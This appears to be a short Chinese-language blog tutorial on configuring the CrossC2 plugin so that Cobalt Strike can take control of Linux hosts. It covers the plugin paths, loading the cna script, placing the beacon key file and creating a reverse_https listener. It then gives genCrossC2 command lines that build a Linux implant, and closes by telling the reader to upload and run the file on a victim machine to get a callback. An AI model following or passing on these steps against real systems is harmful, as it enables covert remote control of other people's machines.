CobaltStrike 默认是不支持Linux 的上线,有一款插件解决了一个问题。就是GitHub的一个项目——CrossC2,以下就介绍一下这款插件的配置和使用。
一、插件配置项目地址:https://github.com/gloxec/CrossC2
将这两个文件下载下来,创建一个文件夹,并放置文件夹下
修改**$CC2_PATH**为真实路径,对应本地存放的CrossC2路径。注意最后的 /修改$CC2_BIN 为payload生成程序赋予genCrossC2.Linux 执行权限
加载cna 脚本
Cobalt Strike --script Manager – load
导入成功后就会多一个菜单 CrossC2
服务端自动生成 .cobaltstrike.beacon_keys,如果没有重新导入几次,然后把给个文件放到CrossC2插件文件夹下,这个文件很重要,是CS的密钥文件,因为CrossC2插件仅支持 reverse_https 协议
因为CeossC2仅支持 reverse_https 所以只能创建 reverse_https监听器
尝试多次生成payload,虽然日志现实已经在 /tmp 生成,但是没有发现
手动生成
生成语法:
CS4.4:
genCrossC2 127.0.0.1 4444 cs_key null Linux x64 ./a.out stager 4.4
CS4.0~4.3:
genCrossC2 127.0.0.1 4444 cs_key null Linux x64 ./a.out
将生成的文件上传至受害机器 并执行
成功上线
